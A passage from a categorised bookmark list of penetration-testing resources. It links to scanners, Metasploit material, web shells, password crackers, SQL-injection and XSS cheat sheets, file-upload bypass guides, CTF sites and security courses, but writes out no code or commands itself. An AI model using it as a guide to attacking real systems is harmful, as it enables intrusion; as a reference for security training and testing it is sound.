[http://www.edge-security.com/theHarvester.php](http://www.edge-security.com/theHarvester.php) * [http://www.mavetju.org/unix/dnstracer-man.php](http://www.mavetju.org/unix/dnstracer-man.php) * [http://www.paterva.com/web5/](http://www.paterva.com/web5/) ### Metadata * [http://www.sans.org/reading_room/whitepapers/privacy/document-metadata-silent-killer_32974](http://www.sans.org/reading_room/whitepapers/privacy/document-metadata-silent-killer_32974) * [http://lcamtuf.coredump.cx/strikeout/](http://lcamtuf.coredump.cx/strikeout/) * [http://www.sno.phy.queensu.ca/~phil/exiftool/](http://www.sno.phy.queensu.ca/~phil/exiftool/) * [http://www.edge-security.com/metagoofil.php](http://www.edge-security.com/metagoofil.php) * [http://www.darkoperator.com/blog/2009/4/24/metadata-enumeration-with-foca.html](http://www.darkoperator.com/blog/2009/4/24/metadata-enumeration-with-foca.html) ## Google Hacking * [http://www.stachliu.com/index.php/resources/tools/google-hacking-diggity-project/](http://www.stachliu.com/index.php/resources/tools/google-hacking-diggity-project/) * [http://midnightresearch.com/projects/search-engine-assessment-tool/#downloads](http://midnightresearch.com/projects/search-engine-assessment-tool/#downloads) * [http://sqid.rubyforge.org/#next](http://sqid.rubyforge.org/#next) * [http://voidnetwork.org/5ynL0rd/darkc0de/python_script/dorkScan.html](http://voidnetwork.org/5ynL0rd/darkc0de/python_script/dorkScan.html) ## Web * [http://www.bindshell.net/tools/beef](http://www.bindshell.net/tools/beef) * [http://blindelephant.sourceforge.net/](http://blindelephant.sourceforge.net/) * [http://xsser.sourceforge.net/](http://xsser.sourceforge.net/) * [http://sourceforge.net/projects/rips-scanner/](http://sourceforge.net/projects/rips-scanner/) * [http://www.divineinvasion.net/authforce/](http://www.divineinvasion.net/authforce/) * [http://andlabs.org/tools.html#sotf](http://andlabs.org/tools.html#sotf) * [http://www.taddong.com/docs/Browser_Exploitation_for_Fun&Profit_Taddong-RaulSiles_Nov2010_v1.1.pdf](http://www.taddong.com/docs/Browser_Exploitation_for_Fun&Profit_Taddong-RaulSiles_Nov2010_v1.1.pdf) * [http://carnal0wnage.blogspot.com/2007/07/using-sqid-sql-injection-digger-to-look.html](http://carnal0wnage.blogspot.com/2007/07/using-sqid-sql-injection-digger-to-look.html) * [http://code.google.com/p/pinata-csrf-tool/](http://code.google.com/p/pinata-csrf-tool/) * [http://xsser.sourceforge.net/#intro](http://xsser.sourceforge.net/#intro) * [http://www.contextis.co.uk/resources/tools/clickjacking-tool/](http://www.contextis.co.uk/resources/tools/clickjacking-tool/) * [http://packetstormsecurity.org/files/view/69896/unicode-fun.txt](http://packetstormsecurity.org/files/view/69896/unicode-fun.txt) * [http://sourceforge.net/projects/ws-attacker/files/](http://sourceforge.net/projects/ws-attacker/files/) * [https://github.com/koto/squid-imposter](https://github.com/koto/squid-imposter) ## Attack Strings * [http://code.google.com/p/fuzzdb/](http://code.google.com/p/fuzzdb/) * [http://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database#tab=Statements](http://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database#tab=Statements) ## Shells * [http://sourceforge.net/projects/yokoso/](http://sourceforge.net/projects/yokoso/) * [http://sourceforge.net/projects/ajaxshell/](http://sourceforge.net/projects/ajaxshell/) ## Scanners * [http://w3af.sourceforge.net/](http://w3af.sourceforge.net/) * [http://code.google.com/p/skipfish/](http://code.google.com/p/skipfish/) * [http://sqlmap.sourceforge.net/](http://sqlmap.sourceforge.net/) * [http://sqid.rubyforge.org/#next](http://sqid.rubyforge.org/#next) * [http://packetstormsecurity.org/UNIX/scanners/XSSscan.py.txt](http://packetstormsecurity.org/UNIX/scanners/XSSscan.py.txt) * [http://code.google.com/p/fimap/wiki/WindowsAttack](http://code.google.com/p/fimap/wiki/WindowsAttack) * [http://code.google.com/p/fm-fsf/](http://code.google.com/p/fm-fsf/) ## Proxies ### Burp * [http://www.sans.org/reading_room/whitepapers/testing/fuzzing-approach-credentials-discovery-burp-intruder_33214](http://www.sans.org/reading_room/whitepapers/testing/fuzzing-approach-credentials-discovery-burp-intruder_33214) * [http://www.gdssecurity.com/l/b/2010/08/10/constricting-the-web-the-gds-burp-api/](http://www.gdssecurity.com/l/b/2010/08/10/constricting-the-web-the-gds-burp-api/) * [http://sourceforge.net/projects/belch/files/](http://sourceforge.net/projects/belch/files/) * [http://www.securityninja.co.uk/application-security/burp-suite-tutorial-repeater-and-comparer-tools](http://www.securityninja.co.uk/application-security/burp-suite-tutorial-repeater-and-comparer-tools) * [http://blog.ombrepixel.com/](http://blog.ombrepixel.com/) * [http://andlabs.org/tools.html#dser](http://andlabs.org/tools.html#dser) * [http://feoh.tistory.com/22](http://feoh.tistory.com/22) * [http://www.sensepost.com/labs/tools/pentest/reduh](http://www.sensepost.com/labs/tools/pentest/reduh) * [http://www.owasp.org/index.php/OWASP_WebScarab_NG_Project](http://www.owasp.org/index.php/OWASP_WebScarab_NG_Project) * [http://intrepidusgroup.com/insight/mallory/](http://intrepidusgroup.com/insight/mallory/) * [http://www.fiddler2.com/fiddler2/](http://www.fiddler2.com/fiddler2/) * [http://websecuritytool.codeplex.com/documentation?referringTitle=Home](http://websecuritytool.codeplex.com/documentation?referringTitle=Home) * [http://translate.google.com/translate?hl=en&sl=es&u=http://xss.codeplex.com/releases/view/43170&prev=/search%3Fq%3Dhttp://www.hackingeek.com/2010/08/x5s-encuentra-fallos-xss-lfi-rfi-en-tus.html%26hl%3Den&rurl=translate.google.com&twu=1](http://translate.google.com/translate?hl=en&sl=es&u=http://xss.codeplex.com/releases/view/43170&prev=/search%3Fq%3Dhttp://www.hackingeek.com/2010/08/x5s-encuentra-fallos-xss-lfi-rfi-en-tus.html%26hl%3Den&rurl=translate.google.com&twu=1) ## Social Engineering * [http://www.secmaniac.com/](http://www.secmaniac.com/) ## Password * [http://nmap.org/ncrack/](http://nmap.org/ncrack/) * [http://www.foofus.net/~jmk/medusa/medusa.html](http://www.foofus.net/~jmk/medusa/medusa.html) * [http://www.openwall.com/john/](http://www.openwall.com/john/) * [http://ophcrack.sourceforge.net/](http://ophcrack.sourceforge.net/) * [http://blog.0x3f.net/tool/keimpx-in-action/](http://blog.0x3f.net/tool/keimpx-in-action/) * [http://code.google.com/p/keimpx/](http://code.google.com/p/keimpx/) * [http://sourceforge.net/projects/hashkill/](http://sourceforge.net/projects/hashkill/) ## Metasploit * [http://www.indepthdefense.com/2009/02/reverse-pivots-with-metasploit-how-not.html](http://www.indepthdefense.com/2009/02/reverse-pivots-with-metasploit-how-not.html) * [http://code.google.com/p/msf-hack/wiki/WmapNikto](http://code.google.com/p/msf-hack/wiki/WmapNikto) * [http://www.indepthdefense.com/2009/01/metasploit-visual-basic-payloads-in.html](http://www.indepthdefense.com/2009/01/metasploit-visual-basic-payloads-in.html) * [http://seclists.org/metasploit/](http://seclists.org/metasploit/) * [http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.html](http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.html) * [http://meterpreter.illegalguy.hostzi.com/](http://meterpreter.illegalguy.hostzi.com/) * [http://blog.metasploit.com/2010/03/automating-metasploit-console.html](http://blog.metasploit.com/2010/03/automating-metasploit-console.html) * [http://www.workrobot.com/sansfire2009/561.html](http://www.workrobot.com/sansfire2009/561.html) * [http://www.securitytube.net/video/711](http://www.securitytube.net/video/711) * [http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient#download](http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient#download) * [http://vimeo.com/16852783](http://vimeo.com/16852783) * [http://milo2012.wordpress.com/2009/09/27/xlsinjector/](http://milo2012.wordpress.com/2009/09/27/xlsinjector/) * [http://www.fastandeasyhacking.com/](http://www.fastandeasyhacking.com/) * [http://trac.happypacket.net/](http://trac.happypacket.net/) * [http://www.blackhat.com/presentations/bh-dc-10/Ames_Colin/BlackHat-DC-2010-colin-david-neurosurgery-with-meterpreter-wp.pdf](http://www.blackhat.com/presentations/bh-dc-10/Ames_Colin/BlackHat-DC-2010-colin-david-neurosurgery-with-meterpreter-wp.pdf) * [http://www.blackhat.com/presentations/bh-dc-10/Egypt/BlackHat-DC-2010-Egypt-UAV-slides.pdf](http://www.blackhat.com/presentations/bh-dc-10/Egypt/BlackHat-DC-2010-Egypt-UAV-slides.pdf) ### MSF Exploits or Easy * [http://www.nessus.org/plugins/index.php?view=single&id=12204](http://www.nessus.org/plugins/index.php?view=single&id=12204) * [http://www.nessus.org/plugins/index.php?view=single&id=11413](http://www.nessus.org/plugins/index.php?view=single&id=11413) * [http://www.nessus.org/plugins/index.php?view=single&id=18021](http://www.nessus.org/plugins/index.php?view=single&id=18021) * [http://www.nessus.org/plugins/index.php?view=single&id=26918](http://www.nessus.org/plugins/index.php?view=single&id=26918) * [http://www.nessus.org/plugins/index.php?view=single&id=34821](http://www.nessus.org/plugins/index.php?view=single&id=34821) * [http://www.nessus.org/plugins/index.php?view=single&id=22194](http://www.nessus.org/plugins/index.php?view=single&id=22194) * [http://www.nessus.org/plugins/index.php?view=single&id=34476](http://www.nessus.org/plugins/index.php?view=single&id=34476) * [http://www.nessus.org/plugins/index.php?view=single&id=25168](http://www.nessus.org/plugins/index.php?view=single&id=25168) * [http://www.nessus.org/plugins/index.php?view=single&id=19408](http://www.nessus.org/plugins/index.php?view=single&id=19408) * [http://www.nessus.org/plugins/index.php?view=single&id=21564](http://www.nessus.org/plugins/index.php?view=single&id=21564) * [http://www.nessus.org/plugins/index.php?view=single&id=10862](http://www.nessus.org/plugins/index.php?view=single&id=10862) * [http://www.nessus.org/plugins/index.php?view=single&id=26925](http://www.nessus.org/plugins/index.php?view=single&id=26925) * [http://www.nessus.org/plugins/index.php?view=single&id=29314](http://www.nessus.org/plugins/index.php?view=single&id=29314) * [http://www.nessus.org/plugins/index.php?view=single&id=23643](http://www.nessus.org/plugins/index.php?view=single&id=23643) * [http://www.nessus.org/plugins/index.php?view=single&id=12052](http://www.nessus.org/plugins/index.php?view=single&id=12052) * [http://www.nessus.org/plugins/index.php?view=single&id=12052](http://www.nessus.org/plugins/index.php?view=single&id=12052) * [http://www.nessus.org/plugins/index.php?view=single&id=34477](http://www.nessus.org/plugins/index.php?view=single&id=34477) * [http://www.nessus.org/plugins/index.php?view=single&id=15962](http://www.nessus.org/plugins/index.php?view=single&id=15962) * [http://www.nessus.org/plugins/index.php?view=single&id=42106](http://www.nessus.org/plugins/index.php?view=single&id=42106) * [http://www.nessus.org/plugins/index.php?view=single&id=15456](http://www.nessus.org/plugins/index.php?view=single&id=15456) * [http://www.nessus.org/plugins/index.php?view=single&id=21689](http://www.nessus.org/plugins/index.php?view=single&id=21689) * [http://www.nessus.org/plugins/index.php?view=single&id=12205](http://www.nessus.org/plugins/index.php?view=single&id=12205) * [http://www.nessus.org/plugins/index.php?view=single&id=22182](http://www.nessus.org/plugins/index.php?view=single&id=22182) * [http://www.nessus.org/plugins/index.php?view=single&id=26919](http://www.nessus.org/plugins/index.php?view=single&id=26919) * [http://www.nessus.org/plugins/index.php?view=single&id=26921](http://www.nessus.org/plugins/index.php?view=single&id=26921) * [http://www.nessus.org/plugins/index.php?view=single&id=21696](http://www.nessus.org/plugins/index.php?view=single&id=21696) * [http://www.nessus.org/plugins/index.php?view=single&id=40887](http://www.nessus.org/plugins/index.php?view=single&id=40887) * [http://www.nessus.org/plugins/index.php?view=single&id=10404](http://www.nessus.org/plugins/index.php?view=single&id=10404) * [http://www.nessus.org/plugins/index.php?view=single&id=18027](http://www.nessus.org/plugins/index.php?view=single&id=18027) * [http://www.nessus.org/plugins/index.php?view=single&id=19402](http://www.nessus.org/plugins/index.php?view=single&id=19402) * [http://www.nessus.org/plugins/index.php?view=single&id=11790](http://www.nessus.org/plugins/index.php?view=single&id=11790) * [http://www.nessus.org/plugins/index.php?view=single&id=12209](http://www.nessus.org/plugins/index.php?view=single&id=12209) * [http://www.nessus.org/plugins/index.php?view=single&id=10673](http://www.nessus.org/plugins/index.php?view=single&id=10673) ## NSE * [http://www.securitytube.net/video/931](http://www.securitytube.net/video/931) * [http://nmap.org/nsedoc/](http://nmap.org/nsedoc/) ## Net Scanners and Scripts * [http://nmap.org/](http://nmap.org/) * [http://asturio.gmxhome.de/software/sambascan2/i.html](http://asturio.gmxhome.de/software/sambascan2/i.html) * [http://www.softperfect.com/products/networkscanner/](http://www.softperfect.com/products/networkscanner/) * [http://www.openvas.org/](http://www.openvas.org/) * [http://tenable.com/products/nessus](http://tenable.com/products/nessus) * [http://www.rapid7.com/vulnerability-scanner.jsp](http://www.rapid7.com/vulnerability-scanner.jsp) * [http://www.eeye.com/products/retina/community](http://www.eeye.com/products/retina/community) ## Post Exploitation * [http://www.awarenetwork.org/home/rattle/source/python/exe2bat.py](http://www.awarenetwork.org/home/rattle/source/python/exe2bat.py) * [http://www.phx2600.org/archive/2008/08/29/metacab/](http://www.phx2600.org/archive/2008/08/29/metacab/) * [http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html](http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html) ## Netcat * [http://readlist.com/lists/insecure.org/nmap-dev/1/7779.html](http://readlist.com/lists/insecure.org/nmap-dev/1/7779.html) * [http://www.radarhack.com/tutorial/ads.pdf](http://www.radarhack.com/tutorial/ads.pdf) * [http://www.infosecwriters.com/text_resources/pdf/Netcat_for_the_Masses_DDebeer.pdf](http://www.infosecwriters.com/text_resources/pdf/Netcat_for_the_Masses_DDebeer.pdf) * [http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf](http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf) * [http://www.dest-unreach.org/socat/](http://www.dest-unreach.org/socat/) * [http://www.antionline.com/archive/index.php/t-230603.html](http://www.antionline.com/archive/index.php/t-230603.html) * [http://technotales.wordpress.com/2009/06/14/netcat-tricks/](http://technotales.wordpress.com/2009/06/14/netcat-tricks/) * [http://seclists.org/nmap-dev/2009/q1/581](http://seclists.org/nmap-dev/2009/q1/581) * [http://www.terminally-incoherent.com/blog/2007/08/07/few-useful-netcat-tricks/](http://www.terminally-incoherent.com/blog/2007/08/07/few-useful-netcat-tricks/) * [http://www.inguardians.com/research/docs/Skoudis_pentestsecrets.pdf](http://www.inguardians.com/research/docs/Skoudis_pentestsecrets.pdf) * [http://gse-compliance.blogspot.com/2008/07/netcat.html](http://gse-compliance.blogspot.com/2008/07/netcat.html) ## Source Inspection * [http://www.justanotherhacker.com/projects/graudit.html](http://www.justanotherhacker.com/projects/graudit.html) * [http://code.google.com/p/javasnoop/](http://code.google.com/p/javasnoop/) ## Firefox Addons * [https://addons.mozilla.org/id/firefox/collections/byrned/pentesting/?page=8](https://addons.mozilla.org/id/firefox/collections/byrned/pentesting/?page=8) * [https://addons.mozilla.org/en-US/firefox/addon/osvdb/](https://addons.mozilla.org/en-US/firefox/addon/osvdb/) * [https://addons.mozilla.org/en-US/firefox/addon/packet-storm-search-plugin/](https://addons.mozilla.org/en-US/firefox/addon/packet-storm-search-plugin/) * [https://addons.mozilla.org/en-US/firefox/addon/default-passwords-cirtne-58786/](https://addons.mozilla.org/en-US/firefox/addon/default-passwords-cirtne-58786/) * [https://addons.mozilla.org/en-US/firefox/addon/offsec-exploit-db-search/](https://addons.mozilla.org/en-US/firefox/addon/offsec-exploit-db-search/) * [https://addons.mozilla.org/en-US/firefox/addon/oval-repository-search-plugin/](https://addons.mozilla.org/en-US/firefox/addon/oval-repository-search-plugin/) * [https://addons.mozilla.org/en-US/firefox/addon/cve-dictionary-search-plugin/](https://addons.mozilla.org/en-US/firefox/addon/cve-dictionary-search-plugin/) * [https://addons.mozilla.org/en-US/firefox/addon/hackbar/](https://addons.mozilla.org/en-US/firefox/addon/hackbar/) ## Tool Listings * [http://packetstormsecurity.org/files/tags/tool](http://packetstormsecurity.org/files/tags/tool) * [http://tools.securitytube.net/index.php?title=Main_Page](http://tools.securitytube.net/index.php?title=Main_Page) ## Training/Classes ## Sec/Hacking * [http://pentest.cryptocity.net/](http://pentest.cryptocity.net/) * [http://www.irongeek.com/i.php?page=videos/network-sniffers-class](http://www.irongeek.com/i.php?page=videos/network-sniffers-class) * [http://samsclass.info/124/124_Sum09.shtml](http://samsclass.info/124/124_Sum09.shtml) * [http://www.cs.ucsb.edu/~vigna/courses/cs279/](http://www.cs.ucsb.edu/~vigna/courses/cs279/) * [http://crypto.stanford.edu/cs142/](http://crypto.stanford.edu/cs142/) * [http://crypto.stanford.edu/cs155/](http://crypto.stanford.edu/cs155/) * [http://cseweb.ucsd.edu/classes/wi09/cse227/](http://cseweb.ucsd.edu/classes/wi09/cse227/) * [http://www-inst.eecs.berkeley.edu/~cs161/sp11/](http://www-inst.eecs.berkeley.edu/~cs161/sp11/) * [http://security.ucla.edu/pages/Security_Talks](http://security.ucla.edu/pages/Security_Talks) * [http://www.cs.rpi.edu/academics/courses/spring10/csci4971/](http://www.cs.rpi.edu/academics/courses/spring10/csci4971/) * [http://cr.yp.to/2004-494.html](http://cr.yp.to/2004-494.html) * [http://www.ece.cmu.edu/~dbrumley/courses/18732-f09/](http://www.ece.cmu.edu/~dbrumley/courses/18732-f09/) * [https://noppa.tkk.fi/noppa/kurssi/t-110.6220/luennot](https://noppa.tkk.fi/noppa/kurssi/t-110.6220/luennot) * [http://stuff.mit.edu/iap/2009/#websecurity](http://stuff.mit.edu/iap/2009/#websecurity) ## Metasploit * [http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training](http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training) * [http://www.irongeek.com/i.php?page=videos/metasploit-class](http://www.irongeek.com/i.php?page=videos/metasploit-class) * [http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,6158.0/](http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,6158.0/) * [http://vimeo.com/16925188](http://vimeo.com/16925188) * [http://www.ustream.tv/recorded/13396511](http://www.ustream.tv/recorded/13396511) * [http://www.ustream.tv/recorded/13397426](http://www.ustream.tv/recorded/13397426) * [http://www.ustream.tv/recorded/13398740](http://www.ustream.tv/recorded/13398740) ## Programming ### Python * [http://code.google.com/edu/languages/google-python-class/index.html](http://code.google.com/edu/languages/google-python-class/index.html) * [http://www.swaroopch.com/notes/Python_en:Table_of_Contents](http://www.swaroopch.com/notes/Python_en:Table_of_Contents) * [http://www.thenewboston.com/?cat=40&pOpen=tutorial](http://www.thenewboston.com/?cat=40&pOpen=tutorial) * [http://showmedo.com/videotutorials/python](http://showmedo.com/videotutorials/python) * [http://www.catonmat.net/blog/learning-python-programming-language-through-video-lectures/](http://www.catonmat.net/blog/learning-python-programming-language-through-video-lectures/) ### Ruby * [http://www.tekniqal.com/](http://www.tekniqal.com/) ## Other Misc * [http://www.cs.sjtu.edu.cn/~kzhu/cs490/](http://www.cs.sjtu.edu.cn/~kzhu/cs490/) * [https://noppa.tkk.fi/noppa/kurssi/t-110.6220/luennot/](https://noppa.tkk.fi/noppa/kurssi/t-110.6220/luennot/) * [http://i-web.i.u-tokyo.ac.jp/edu/training/ss/lecture/new-documents/Lectures/](http://i-web.i.u-tokyo.ac.jp/edu/training/ss/lecture/new-documents/Lectures/) * [http://resources.infosecinstitute.com/](http://resources.infosecinstitute.com/) * [http://vimeo.com/user2720399](http://vimeo.com/user2720399) ## Web Vectors ## SQLi * [http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/](http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/) * [http://isc.sans.edu/diary.html?storyid=9397](http://isc.sans.edu/diary.html?storyid=9397) * [http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/](http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/) * [http://www.evilsql.com/main/index.php](http://www.evilsql.com/main/index.php) * [http://xd-blog.com.ar/descargas/manuales/bugs/full-mssql-injection-pwnage.html](http://xd-blog.com.ar/descargas/manuales/bugs/full-mssql-injection-pwnage.html) * [http://securityoverride.com/articles.php?article_id=1&article=The_Complete_Guide_to_SQL_Injections](http://securityoverride.com/articles.php?article_id=1&article=The_Complete_Guide_to_SQL_Injections) * [http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/](http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/) * [http://sqlzoo.net/hack/](http://sqlzoo.net/hack/) * [http://www.sqlteam.com/article/sql-server-versions](http://www.sqlteam.com/article/sql-server-versions) * [http://www.krazl.com/blog/?p=3](http://www.krazl.com/blog/?p=3) * [http://www.owasp.org/index.php/Testing_for_MS_Access](http://www.owasp.org/index.php/Testing_for_MS_Access) * [http://web.archive.org/web/20101112061524/http://seclists.org/pen-test/2003/May/0074.html](http://web.archive.org/web/20101112061524/http://seclists.org/pen-test/2003/May/0074.html) * [http://web.archive.org/web/20080822123152/http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html](http://web.archive.org/web/20080822123152/http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html) * [http://www.youtube.com/watch?v=WkHkryIoLD0](http://www.youtube.com/watch?v=WkHkryIoLD0) * [http://layerone.info/archives/2009/Joe%20McCray%20-%20Advanced%20SQL%20Injection%20-%20L1%202009.pdf](http://layerone.info/archives/2009/Joe%20McCray%20-%20Advanced%20SQL%20Injection%20-%20L1%202009.pdf) * [http://vimeo.com/3418947](http://vimeo.com/3418947) * [http://sla.ckers.org/forum/read.php?24,33903](http://sla.ckers.org/forum/read.php?24,33903) * [http://websec.files.wordpress.com/2010/11/sqli2.pdf](http://websec.files.wordpress.com/2010/11/sqli2.pdf) * [http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/](http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/) * [http://ha.ckers.org/sqlinjection/](http://ha.ckers.org/sqlinjection/) * [http://lab.mediaservice.net/notes_more.php?id=MSSQL](http://lab.mediaservice.net/notes_more.php?id=MSSQL) ## Upload Tricks * [http://www.google.com/#hl=en&q=bypassing+upload+file+type&start=40&sa=N&fp=a2bb30ecf4f91972](http://www.google.com/#hl=en&q=bypassing+upload+file+type&start=40&sa=N&fp=a2bb30ecf4f91972) * [http://blog.skeptikal.org/2009/11/adobe-responds-sort-of.html](http://blog.skeptikal.org/2009/11/adobe-responds-sort-of.html) * [http://blog.insicdesigns.com/2009/01/secure-file-upload-in-php-web-applications/](http://blog.insicdesigns.com/2009/01/secure-file-upload-in-php-web-applications/) * [http://perishablepress.com/press/2006/01/10/stupid-htaccess-tricks/](http://perishablepress.com/press/2006/01/10/stupid-htaccess-tricks/) * [http://ex.ploit.net/f20/tricks-tips-bypassing-image-uploaders-t3hmadhatt3r-38/](http://ex.ploit.net/f20/tricks-tips-bypassing-image-uploaders-t3hmadhatt3r-38/) * [http://www.ravenphpscripts.com/article2974.html](http://www.ravenphpscripts.com/article2974.html) * [http://www.acunetix.com/cross-site-scripting/scanner.htm](http://www.acunetix.com/cross-site-scripting/scanner.htm) * [http://www.vupen.com/english/advisories/2009/3634](http://www.vupen.com/english/advisories/2009/3634) * [http://msdn.microsoft.com/en-us/library/aa478971.aspx](http://msdn.microsoft.com/en-us/library/aa478971.aspx) * [http://dev.tangocms.org/issues/237](http://dev.tangocms.org/issues/237) * [http://seclists.org/fulldisclosure/2006/Jun/508](http://seclists.org/fulldisclosure/2006/Jun/508) * [http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/](http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/) * [http://www.ipolicynetworks.com/technology/files/TikiWiki_jhot.php_Script_File_Upload_Security_Bypass_Vulnerability.html](http://www.ipolicynetworks.com/technology/files/TikiWiki_jhot.php_Script_File_Upload_Security_Bypass_Vulnerability.html) * [http://shsc.info/FileUploadSecurity](http://shsc.info/FileUploadSecurity) ## LFI/RFI * [http://pastie.org/840199](http://pastie.org/840199) * [http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/](http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/) * [http://www.notsosecure.com/folder2/2010/08/20/lfi-code-exec-remote-root/?utm_source=twitterfeed&utm_medium=twitter](http://www.notsosecure.com/folder2/2010/08/20/lfi-code-exec-remote-root/?utm_source=twitterfeed&utm_medium=twitter) * [http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/](http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/) * [http://www.digininja.org/blog/when_all_you_can_do_is_read.php](http://www.digininja.org/blog/when_all_you_can_do_is_read.php) ## XSS * [http://www.infosecwriters.com/hhworld/hh8/csstut.htm](http://www.infosecwriters.com/hhworld/hh8/csstut.htm) * [http://www.technicalinfo.net/papers/CSS.html](http://www.technicalinfo.net/papers/CSS.html) * [http://msmvps.com/blogs/alunj/archive/2010/07/07/1773441.aspx](http://msmvps.com/blogs/alunj/archive/2010/07/07/1773441.aspx) * [http://forum.intern0t.net/web-hacking-war-games/112-cross-site-scripting-attack-defense-guide.html](http://forum.intern0t.net/web-hacking-war-games/112-cross-site-scripting-attack-defense-guide.html) * [https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf](https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf) * [http://sirdarckcat.blogspot.com/2009/08/our-favorite-xss-filters-and-how-to.html](http://sirdarckcat.blogspot.com/2009/08/our-favorite-xss-filters-and-how-to.html) * [http://www.securityaegis.com/filter-evasion-houdini-on-the-wire/](http://www.securityaegis.com/filter-evasion-houdini-on-the-wire/) * [http://heideri.ch/jso/#javascript](http://heideri.ch/jso/#javascript) * [http://www.reddit.com/r/xss/](http://www.reddit.com/r/xss/) * [http://sla.ckers.org/forum/list.php?2](http://sla.ckers.org/forum/list.php?2) ## Coldfusion * [http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/](http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/) * [http://zastita.com/02114/Attacking_ColdFusion..html](http://zastita.com/02114/Attacking_ColdFusion..html) * [http://www.nosec.org/2010/0809/629.html](http://www.nosec.org/2010/0809/629.html) * [http://h30507.www3.hp.com/t5/Following-the-White-Rabbit-A/Adobe-ColdFusion-s-Directory-Traversal-Disaster/ba-p/81964](http://h30507.www3.hp.com/t5/Following-the-White-Rabbit-A/Adobe-ColdFusion-s-Directory-Traversal-Disaster/ba-p/81964) * [http://cfunited.com/2009/files/presentations/254_ShlomyGantz_August2009_HackProofingColdFusion.pdf](http://cfunited.com/2009/files/presentations/254_ShlomyGantz_August2009_HackProofingColdFusion.pdf) ## Sharepoint * [http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,6131.msg32678/#msg32678](http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,6131.msg32678/#msg32678) ## Lotus * [http://blog.ombrepixel.com/post/2009/05/06/Lotus-Notes/Domino-Security](http://blog.ombrepixel.com/post/2009/05/06/Lotus-Notes/Domino-Security) * [http://seclists.org/pen-test/2002/Nov/43](http://seclists.org/pen-test/2002/Nov/43) * [http://www.sectechno.com/2010/07/12/hacking-lotus-domino/?](http://www.sectechno.com/2010/07/12/hacking-lotus-domino/?) ## JBoss * [http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf](http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf) * [http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html](http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html) ## VMWare Web * [http://www.metasploit.com/modules/auxiliary/scanner/http/vmware_server_dir_trav](http://www.metasploit.com/modules/auxiliary/scanner/http/vmware_server_dir_trav) ## Oracle App Servers * [http://www.hideaway.net/2007/07/hacking-oracle-application-servers.html](http://www.hideaway.net/2007/07/hacking-oracle-application-servers.html) * [http://www.owasp.org/index.php/Testing_for_Oracle](http://www.owasp.org/index.php/Testing_for_Oracle) * [http://www.ngssoftware.com/services/software-products/internet-security/orascan.aspx](http://www.ngssoftware.com/services/software-products/internet-security/orascan.aspx) * [http://www.ngssoftware.com/services/software-products/Database-Security/NGSSQuirreLOracle.aspx](http://www.ngssoftware.com/services/software-products/Database-Security/NGSSQuirreLOracle.aspx) * [http://www.ngssoftware.com/papers/hpoas.pdf](http://www.ngssoftware.com/papers/hpoas.pdf) ## SAP * [http://www.onapsis.com/research.html#bizploit](http://www.onapsis.com/research.html#bizploit) * [http://marc.info/?l=john-users&m=121444075820309&w=2](http://marc.info/?l=john-users&m=121444075820309&w=2) * [http://www.phenoelit-us.org/whatSAP/index.html](http://www.phenoelit-us.org/whatSAP/index.html) ## Wireless * [http://code.google.com/p/pyrit/](http://code.google.com/p/pyrit/) ## Capture the Flag/Wargames * [http://intruded.net/](http://intruded.net/) * [http://smashthestack.org/](http://smashthestack.org/) * [http://flack.hkpco.kr/](http://flack.hkpco.kr/) * [http://ctf.hcesperer.org/](http://ctf.hcesperer.org/) * [http://ictf.cs.ucsb.edu/](http://ictf.cs.ucsb.edu/) * [http://capture.thefl.ag/calendar/](http://capture.thefl.ag/calendar/) ## Conferences * [https://www.google.com/calendar/[email protected]&gsessionid=OK](https://www.google.com/calendar/[email protected]&gsessionid=OK) ## Misc/Unsorted * [http://www.ikkisoft.com/stuff/SMH_XSS.txt](http://www.ikkisoft.com/stuff/SMH_XSS.txt) * 